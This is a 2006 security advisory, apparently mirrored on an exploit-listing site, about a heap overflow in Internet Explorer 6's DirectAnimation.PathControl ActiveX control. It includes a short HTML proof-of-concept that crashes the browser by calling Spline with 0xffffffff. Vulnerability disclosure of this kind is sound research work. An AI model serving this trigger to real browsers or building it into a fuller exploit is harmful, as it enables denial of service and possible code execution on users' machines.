Advertisement






Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability

CVE Category Price Severity
Author Risk Exploitation Type Date
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080173

Below is a copy:

Advisory ID:
XSec-06-10

Advisory Name:
Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability

Release Date:
08/28/2006

Tested on:
Windows 2000/XP/2003 Internet Explorer 6.0 SP1

Affected version:
Windows 2000
Windows XP
Windows 2003

Author:
nop <nop#xsec.org>
http://www.xsec.org

Overview:
When Internet Explorer handle DirectAnimation.PathControl COM
object(daxctle.ocx) Spline method, Set the first parameter to 0xffffffff will triggers an
invalid memory write, That an attacker may DoS and possibly could execute arbitrary code.

Exploit:
=============== daxctle.htm start ================

<!--
// Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability
// tested on Windows 2000 SP4/XP SP2/2003 SP1

// http://www.xsec.org
// nop (nop#xsec.org)

// CLSID: {D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}
// Info: Microsoft DirectAnimation Path
// ProgID: DirectAnimation.PathControl
// InprocServer32: C:WINNTsystem32daxctle.ocx

--!>
<html>
<head>
<title>test</title>
</head>
<body>
<script>

var target = new ActiveXObject("DirectAnimation.PathControl");

target.Spline(0xffffffff, 1);

</script>
</body>
</html>

=============== daxctle.htm end ==================

Link:
http://www.xsec.org/index.php?module=releases&act=view&type=1&id=19

About XSec:
We are redhat.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum